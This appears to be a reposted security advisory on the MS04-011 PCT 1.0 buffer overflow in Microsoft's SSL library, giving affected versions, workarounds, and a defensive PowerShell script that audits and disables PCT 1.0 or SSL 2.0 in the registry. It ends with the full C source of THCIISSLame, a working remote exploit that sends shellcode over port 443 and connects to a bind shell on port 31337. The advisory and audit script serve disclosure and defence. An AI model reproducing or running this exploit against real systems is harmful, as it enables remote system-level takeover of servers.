ISS X-Force has discovered a remotely exploitable buffer overflow condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an encryption technology commonly used to secure Web and email communications. A buffer overflow condition occurs when processing PCT 1.0 handshake packets that can lead to remote, privileged compromise of affected Windows installations.
Credit:
The information has been provided by Mark Dowd and Neel Mehta of the ISS X-Force.
The exploit has been provided by: johnny cyberpunk of THC
Affected Versions:
* Microsoft Windows 2000 up to and including SP4
* Microsoft Windows NT version 4 up to and including SP6a
* Microsoft Windows XP up to SP1
Note: The SSL library included in Windows Server 2003 contains the vulnerability. However, the PCT 1.0 protocol is disabled by default.
Impact:
If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0 protocols are enabled, remote attackers may exploit the buffer overflow condition to execute arbitrary code on vulnerable Windows server installations. This code would run with local system privileges. The protocols necessary for remote exploitation are enabled by default in Windows 2000 and Windows NT version 4.
Common vectors for exploitation might include Internet Information Server (IIS), Exchange Server, Active Directory, and potentially any software making use of the Microsoft SSL library including unlisted third-party software.
The severity of this vulnerability is compounded by the fact that SSL is most often used to secure communications involving confidential or valuable financial information, and that firewalls and packet filtering alone will not be able to stop attacks, since the malicious handshake arrives on the same port as legitimate SSL traffic. X-Force believes that hackers will aggressively target this vulnerability given the high-value nature of Web sites protected by SSL.
Solution:
The PCT 1.0 protocol is a legacy protocol that is not required for secure SSL communication. The PCT 1.0 protocol can be safely disabled as a workaround for the vulnerability described in this advisory. However, systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0 without impacting MSMQ. In this circumstance, SSL 2.0 can be safely disabled to close the vulnerability. Successful exploitation of the vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.
Customers are encouraged to immediately evaluate the two scenarios described above and select a workaround that best applies to their environment.
Microsoft has published a Knowledge Base article (187498) that describes how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL 3.0. Microsoft Knowledge Base article 187498 is available at the following address:
http://support.microsoft.com/support/kb/articles/q187/4/98.asp
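The following audit and remediation script is an added example, not code from ISS, THC or Microsoft. It reads the SCHANNEL registry values that Knowledge Base article 187498 describes (an "Enabled" DWORD under Protocols\<name>\Server), reports whether a host still has both PCT 1.0 and SSL 2.0 enabled server-side, and can apply either workaround from the Solution section. It assumes the KB187498 layout, where a missing key or value means the protocol is enabled (the default on Windows 2000 and NT 4), and it is written for hosts where PowerShell is available; on the original platforms the same values can be set with regedit.

```powershell
# Audit/remediate the MS04-011 PCT 1.0 exposure via the SCHANNEL registry
# keys documented in KB187498. Added example; assumes the KB187498 layout:
#   HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\<Protocol>\Server
#   Enabled (REG_DWORD) = 0 disables the protocol; absent = enabled by default.

$schannel = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'

function Get-SchannelServerState {
    param([Parameter(Mandatory)][string]$Protocol)   # e.g. 'PCT 1.0' or 'SSL 2.0'
    $key = Join-Path $schannel "$Protocol\Server"
    if (-not (Test-Path $key)) { return 'Enabled (key absent, default)' }
    $v = Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue
    if ($null -eq $v) { return 'Enabled (value absent, default)' }
    if ($v.Enabled -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Test-Pct10Exposure {
    # Exploitation needs BOTH protocols enabled, so the host is exposed
    # only when neither has been switched off.
    $pct  = Get-SchannelServerState -Protocol 'PCT 1.0'
    $ssl2 = Get-SchannelServerState -Protocol 'SSL 2.0'
    [pscustomobject]@{
        'PCT 1.0' = $pct
        'SSL 2.0' = $ssl2
        Exposed   = ($pct -like 'Enabled*') -and ($ssl2 -like 'Enabled*')
    }
}

function Disable-SchannelServerProtocol {
    param([Parameter(Mandatory)][string]$Protocol)
    $key = Join-Path $schannel "$Protocol\Server"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name Enabled -PropertyType DWord -Value 0 -Force | Out-Null
    Write-Host "Disabled $Protocol server-side; SCHANNEL reads the value after a reboot."
}

# Audit only; uncomment one of the remediation lines to apply a workaround.
Test-Pct10Exposure | Format-List
# Disable-SchannelServerProtocol -Protocol 'PCT 1.0'   # general case
# Disable-SchannelServerProtocol -Protocol 'SSL 2.0'   # hosts that need PCT 1.0 for MSMQ
```

Run the audit before and after applying the workaround; the Exposed field should flip to False once either protocol reports Disabled. The MSMQ caveat from the Solution section is why the script offers both knobs instead of hard-coding PCT 1.0.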
Additional Information:
Microsoft Security Bulletin MS04-011: http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Exploit:
/*****************************************************************************/
/* THCIISSLame 0.1 - IIS 5 SSL remote root exploit                           */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                           */
/* Bug was found by Internet Security Systems                                */
/* Reversing credits of the bug go to Halvar Flake                           */
/*                                                                           */
/* compile with MS Visual C++ : cl THCIISSLame.c                             */
/*                                                                           */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
/* scut, stealth, FtR and Random                                             */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
    unsigned int i,sock,sock2,addr,rc;
    unsigned char *badbuf,*p;
    unsigned long offset = 0x6741a1cd;
    unsigned long XOR = 0xffffffff;
    struct sockaddr_in mytcp;
    struct hostent * hp;
    WSADATA wsaData;

    printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
    printf("tested on Windows 2000 Server german/english SP4\n");
    printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

    if(argc<2 || argc>2)
        usage();

    badbuf = malloc(347);
    memset(badbuf,0,347);

    printf("\n[*] building buffer\n");

    p = badbuf;

    memcpy(p,sslshit,sizeof(sslshit));
    p+=sizeof(sslshit)-1;

    strcat(p,jumper);
    strcat(p,greetings_to_microsoft);
    offset^=XOR;
    strncat(p,(unsigned char *)&offset,4);
    strcat(p,shellcode);

    if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
    {
        printf("WSAStartup failed !\n");
        exit(-1);
    }

    hp = gethostbyname(argv[1]);

    if (!hp){
        addr = inet_addr(argv[1]);
    }
    if ((!hp) && (addr == INADDR_NONE) )
    {
        printf("Unable to resolve %s\n",argv[1]);
        exit(-1);
    }

    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (!sock)
    {
        printf("socket() error...\n");
        exit(-1);
    }

    if (hp != NULL)
        memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
    else
        mytcp.sin_addr.s_addr = addr;

    if (hp)
        mytcp.sin_family = hp->h_addrtype;
    else
        mytcp.sin_family = AF_INET;

    mytcp.sin_port=htons(443);

    printf("[*] connecting the target\n");

    rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
    if(rc==0)
    {
        send(sock,badbuf,346,0);
        printf("[*] Exploit send successfully ! Sleeping a while ....\n");
        Sleep(1000);
    }
    else
        printf("\nCan't connect to ssl port 443!\n");

    if(rc==0)
    {
        printf("[*] Trying to get a shell\n\n");
        sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        mytcp.sin_port = htons(31337);
        rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
        if(rc!=0)
        {
            printf("can't connect to port 31337 ;( maybe firewalled ...\n");
            exit(-1);
        }
        shell(sock2);
    }

    shutdown(sock,1);
    closesocket(sock);
    free(badbuf);
    exit(0);
}

void usage()
{
    unsigned int a;
    printf("\nUsage: <Host>\n");
    printf("Sample: THCIISSLame 31.33.7.23\n\n");
    exit(0);
}

void shell(int sock)
{
    int l;
    char buf[1024];
    struct timeval time;
    unsigned long ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
        {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("bye bye...\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("bye bye...\n");
                return;
            }
        }
        else
        {
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("bye bye...\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("bye bye...\n");
                return;
            }
        }
    }
}